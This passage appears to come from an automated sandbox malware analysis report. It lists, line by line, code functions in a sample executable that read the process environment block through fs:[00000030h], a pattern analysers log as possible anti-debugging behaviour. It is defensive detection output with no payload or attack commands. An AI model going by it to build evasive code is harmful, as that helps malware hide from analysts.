                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011903E9 mov eax, dword ptr fs:[00000030h]9_2_011903E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012243D4 mov eax, dword ptr fs:[00000030h]9_2_012243D4
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012243D4 mov eax, dword ptr fs:[00000030h]9_2_012243D4
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E3DB mov eax, dword ptr fs:[00000030h]9_2_0122E3DB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E3DB mov eax, dword ptr fs:[00000030h]9_2_0122E3DB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E3DB mov ecx, dword ptr fs:[00000030h]9_2_0122E3DB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122E3DB mov eax, dword ptr fs:[00000030h]9_2_0122E3DB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117823B mov eax, dword ptr fs:[00000030h]9_2_0117823B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01186259 mov eax, dword ptr fs:[00000030h]9_2_01186259
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117A250 mov eax, dword ptr fs:[00000030h]9_2_0117A250
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01208243 mov eax, dword ptr fs:[00000030h]9_2_01208243
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01208243 mov ecx, dword ptr fs:[00000030h]9_2_01208243
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01184260 mov eax, dword ptr fs:[00000030h]9_2_01184260
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01184260 mov eax, dword ptr fs:[00000030h]9_2_01184260
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01184260 mov eax, dword ptr fs:[00000030h]9_2_01184260
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117826B mov eax, dword ptr fs:[00000030h]9_2_0117826B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012162A0 mov eax, dword ptr fs:[00000030h]9_2_012162A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012162A0 mov ecx, dword ptr fs:[00000030h]9_2_012162A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012162A0 mov eax, dword ptr fs:[00000030h]9_2_012162A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012162A0 mov eax, dword ptr fs:[00000030h]9_2_012162A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012162A0 mov eax, dword ptr fs:[00000030h]9_2_012162A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012162A0 mov eax, dword ptr fs:[00000030h]9_2_012162A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE284 mov eax, dword ptr fs:[00000030h]9_2_011BE284
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE284 mov eax, dword ptr fs:[00000030h]9_2_011BE284
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01200283 mov eax, dword ptr fs:[00000030h]9_2_01200283
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01200283 mov eax, dword ptr fs:[00000030h]9_2_01200283
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01200283 mov eax, dword ptr fs:[00000030h]9_2_01200283
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011902A0 mov eax, dword ptr fs:[00000030h]9_2_011902A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011902A0 mov eax, dword ptr fs:[00000030h]9_2_011902A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A2C3 mov eax, dword ptr fs:[00000030h]9_2_0118A2C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A2C3 mov eax, dword ptr fs:[00000030h]9_2_0118A2C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A2C3 mov eax, dword ptr fs:[00000030h]9_2_0118A2C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A2C3 mov eax, dword ptr fs:[00000030h]9_2_0118A2C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A2C3 mov eax, dword ptr fs:[00000030h]9_2_0118A2C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011902E1 mov eax, dword ptr fs:[00000030h]9_2_011902E1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011902E1 mov eax, dword ptr fs:[00000030h]9_2_011902E1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011902E1 mov eax, dword ptr fs:[00000030h]9_2_011902E1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01216500 mov eax, dword ptr fs:[00000030h]9_2_01216500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE53E mov eax, dword ptr fs:[00000030h]9_2_011AE53E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE53E mov eax, dword ptr fs:[00000030h]9_2_011AE53E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE53E mov eax, dword ptr fs:[00000030h]9_2_011AE53E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE53E mov eax, dword ptr fs:[00000030h]9_2_011AE53E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE53E mov eax, dword ptr fs:[00000030h]9_2_011AE53E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254500 mov eax, dword ptr fs:[00000030h]9_2_01254500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254500 mov eax, dword ptr fs:[00000030h]9_2_01254500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254500 mov eax, dword ptr fs:[00000030h]9_2_01254500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254500 mov eax, dword ptr fs:[00000030h]9_2_01254500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254500 mov eax, dword ptr fs:[00000030h]9_2_01254500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254500 mov eax, dword ptr fs:[00000030h]9_2_01254500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254500 mov eax, dword ptr fs:[00000030h]9_2_01254500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190535 mov eax, dword ptr fs:[00000030h]9_2_01190535
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190535 mov eax, dword ptr fs:[00000030h]9_2_01190535
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190535 mov eax, dword ptr fs:[00000030h]9_2_01190535
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190535 mov eax, dword ptr fs:[00000030h]9_2_01190535
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190535 mov eax, dword ptr fs:[00000030h]9_2_01190535
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190535 mov eax, dword ptr fs:[00000030h]9_2_01190535
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01188550 mov eax, dword ptr fs:[00000030h]9_2_01188550
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01188550 mov eax, dword ptr fs:[00000030h]9_2_01188550
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B656A mov eax, dword ptr fs:[00000030h]9_2_011B656A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B656A mov eax, dword ptr fs:[00000030h]9_2_011B656A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B656A mov eax, dword ptr fs:[00000030h]9_2_011B656A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012005A7 mov eax, dword ptr fs:[00000030h]9_2_012005A7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012005A7 mov eax, dword ptr fs:[00000030h]9_2_012005A7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012005A7 mov eax, dword ptr fs:[00000030h]9_2_012005A7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE59C mov eax, dword ptr fs:[00000030h]9_2_011BE59C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B4588 mov eax, dword ptr fs:[00000030h]9_2_011B4588
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01182582 mov eax, dword ptr fs:[00000030h]9_2_01182582
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01182582 mov ecx, dword ptr fs:[00000030h]9_2_01182582
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A45B1 mov eax, dword ptr fs:[00000030h]9_2_011A45B1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A45B1 mov eax, dword ptr fs:[00000030h]9_2_011A45B1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011865D0 mov eax, dword ptr fs:[00000030h]9_2_011865D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA5D0 mov eax, dword ptr fs:[00000030h]9_2_011BA5D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA5D0 mov eax, dword ptr fs:[00000030h]9_2_011BA5D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE5CF mov eax, dword ptr fs:[00000030h]9_2_011BE5CF
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE5CF mov eax, dword ptr fs:[00000030h]9_2_011BE5CF
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BC5ED mov eax, dword ptr fs:[00000030h]9_2_011BC5ED
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BC5ED mov eax, dword ptr fs:[00000030h]9_2_011BC5ED
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011825E0 mov eax, dword ptr fs:[00000030h]9_2_011825E0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206420 mov eax, dword ptr fs:[00000030h]9_2_01206420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206420 mov eax, dword ptr fs:[00000030h]9_2_01206420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206420 mov eax, dword ptr fs:[00000030h]9_2_01206420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206420 mov eax, dword ptr fs:[00000030h]9_2_01206420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206420 mov eax, dword ptr fs:[00000030h]9_2_01206420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206420 mov eax, dword ptr fs:[00000030h]9_2_01206420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206420 mov eax, dword ptr fs:[00000030h]9_2_01206420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B8402 mov eax, dword ptr fs:[00000030h]9_2_011B8402
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B8402 mov eax, dword ptr fs:[00000030h]9_2_011B8402
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B8402 mov eax, dword ptr fs:[00000030h]9_2_011B8402
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA430 mov eax, dword ptr fs:[00000030h]9_2_011BA430
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0117C427 mov eax, dword ptr fs:[00000030h] | 9_2_0117C427
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0117E420 mov eax, dword ptr fs:[00000030h] | 9_2_0117E420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0117E420 mov eax, dword ptr fs:[00000030h] | 9_2_0117E420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0117E420 mov eax, dword ptr fs:[00000030h] | 9_2_0117E420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A245A mov eax, dword ptr fs:[00000030h] | 9_2_011A245A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0120C460 mov ecx, dword ptr fs:[00000030h] | 9_2_0120C460
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0117645D mov eax, dword ptr fs:[00000030h] | 9_2_0117645D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h] | 9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h] | 9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h] | 9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h] | 9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h] | 9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h] | 9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h] | 9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h] | 9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011AA470 mov eax, dword ptr fs:[00000030h] | 9_2_011AA470
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011AA470 mov eax, dword ptr fs:[00000030h] | 9_2_011AA470
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011AA470 mov eax, dword ptr fs:[00000030h] | 9_2_011AA470
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0120A4B0 mov eax, dword ptr fs:[00000030h] | 9_2_0120A4B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B44B0 mov ecx, dword ptr fs:[00000030h] | 9_2_011B44B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011864AB mov eax, dword ptr fs:[00000030h] | 9_2_011864AB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011804E5 mov ecx, dword ptr fs:[00000030h] | 9_2_011804E5
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01180710 mov eax, dword ptr fs:[00000030h] | 9_2_01180710
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B0710 mov eax, dword ptr fs:[00000030h] | 9_2_011B0710
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BC700 mov eax, dword ptr fs:[00000030h] | 9_2_011BC700
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B273C mov eax, dword ptr fs:[00000030h] | 9_2_011B273C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B273C mov ecx, dword ptr fs:[00000030h] | 9_2_011B273C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B273C mov eax, dword ptr fs:[00000030h] | 9_2_011B273C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FC730 mov eax, dword ptr fs:[00000030h] | 9_2_011FC730
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BC720 mov eax, dword ptr fs:[00000030h] | 9_2_011BC720
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BC720 mov eax, dword ptr fs:[00000030h] | 9_2_011BC720
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01180750 mov eax, dword ptr fs:[00000030h] | 9_2_01180750
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011C2750 mov eax, dword ptr fs:[00000030h] | 9_2_011C2750
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011C2750 mov eax, dword ptr fs:[00000030h] | 9_2_011C2750
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B674D mov esi, dword ptr fs:[00000030h] | 9_2_011B674D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B674D mov eax, dword ptr fs:[00000030h] | 9_2_011B674D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B674D mov eax, dword ptr fs:[00000030h] | 9_2_011B674D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01188770 mov eax, dword ptr fs:[00000030h] | 9_2_01188770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190770 mov eax, dword ptr fs:[00000030h] | 9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190770 mov eax, dword ptr fs:[00000030h] | 9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190770 mov eax, dword ptr fs:[00000030h] | 9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190770 mov eax, dword ptr fs:[00000030h] | 9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190770 mov eax, dword ptr fs:[00000030h] | 9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190770 mov eax, dword ptr fs:[00000030h] | 9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190770 mov eax, dword ptr fs:[00000030h] | 9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190770 mov eax, dword ptr fs:[00000030h] | 9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190770 mov eax, dword ptr fs:[00000030h] | 9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190770 mov eax, dword ptr fs:[00000030h] | 9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190770 mov eax, dword ptr fs:[00000030h] | 9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190770 mov eax, dword ptr fs:[00000030h] | 9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01204755 mov eax, dword ptr fs:[00000030h] | 9_2_01204755
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0120E75D mov eax, dword ptr fs:[00000030h] | 9_2_0120E75D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_012347A0 mov eax, dword ptr fs:[00000030h] | 9_2_012347A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0122678E mov eax, dword ptr fs:[00000030h] | 9_2_0122678E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011807AF mov eax, dword ptr fs:[00000030h] | 9_2_011807AF
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0120E7E1 mov eax, dword ptr fs:[00000030h] | 9_2_0120E7E1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118C7C0 mov eax, dword ptr fs:[00000030h] | 9_2_0118C7C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011847FB mov eax, dword ptr fs:[00000030h] | 9_2_011847FB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011847FB mov eax, dword ptr fs:[00000030h] | 9_2_011847FB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_012007C3 mov eax, dword ptr fs:[00000030h] | 9_2_012007C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A27ED mov eax, dword ptr fs:[00000030h] | 9_2_011A27ED
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A27ED mov eax, dword ptr fs:[00000030h] | 9_2_011A27ED
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A27ED mov eax, dword ptr fs:[00000030h] | 9_2_011A27ED
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011C2619 mov eax, dword ptr fs:[00000030h] | 9_2_011C2619
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0119260B mov eax, dword ptr fs:[00000030h] | 9_2_0119260B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0119260B mov eax, dword ptr fs:[00000030h] | 9_2_0119260B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0119260B mov eax, dword ptr fs:[00000030h] | 9_2_0119260B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0119260B mov eax, dword ptr fs:[00000030h] | 9_2_0119260B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0119260B mov eax, dword ptr fs:[00000030h] | 9_2_0119260B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0119260B mov eax, dword ptr fs:[00000030h] | 9_2_0119260B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0119260B mov eax, dword ptr fs:[00000030h] | 9_2_0119260B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FE609 mov eax, dword ptr fs:[00000030h] | 9_2_011FE609
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118262C mov eax, dword ptr fs:[00000030h] | 9_2_0118262C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B6620 mov eax, dword ptr fs:[00000030h] | 9_2_011B6620
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B8620 mov eax, dword ptr fs:[00000030h] | 9_2_011B8620
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0119E627 mov eax, dword ptr fs:[00000030h] | 9_2_0119E627
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0124866E mov eax, dword ptr fs:[00000030h] | 9_2_0124866E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0124866E mov eax, dword ptr fs:[00000030h] | 9_2_0124866E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0119C640 mov eax, dword ptr fs:[00000030h] | 9_2_0119C640
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B2674 mov eax, dword ptr fs:[00000030h] | 9_2_011B2674
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BA660 mov eax, dword ptr fs:[00000030h] | 9_2_011BA660
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BA660 mov eax, dword ptr fs:[00000030h] | 9_2_011BA660
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01184690 mov eax, dword ptr fs:[00000030h] | 9_2_01184690
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01184690 mov eax, dword ptr fs:[00000030h] | 9_2_01184690
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B66B0 mov eax, dword ptr fs:[00000030h] | 9_2_011B66B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BC6A6 mov eax, dword ptr fs:[00000030h] | 9_2_011BC6A6
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_012006F1 mov eax, dword ptr fs:[00000030h] | 9_2_012006F1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_012006F1 mov eax, dword ptr fs:[00000030h] | 9_2_012006F1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BA6C7 mov ebx, dword ptr fs:[00000030h] | 9_2_011BA6C7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BA6C7 mov eax, dword ptr fs:[00000030h] | 9_2_011BA6C7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FE6F2 mov eax, dword ptr fs:[00000030h] | 9_2_011FE6F2
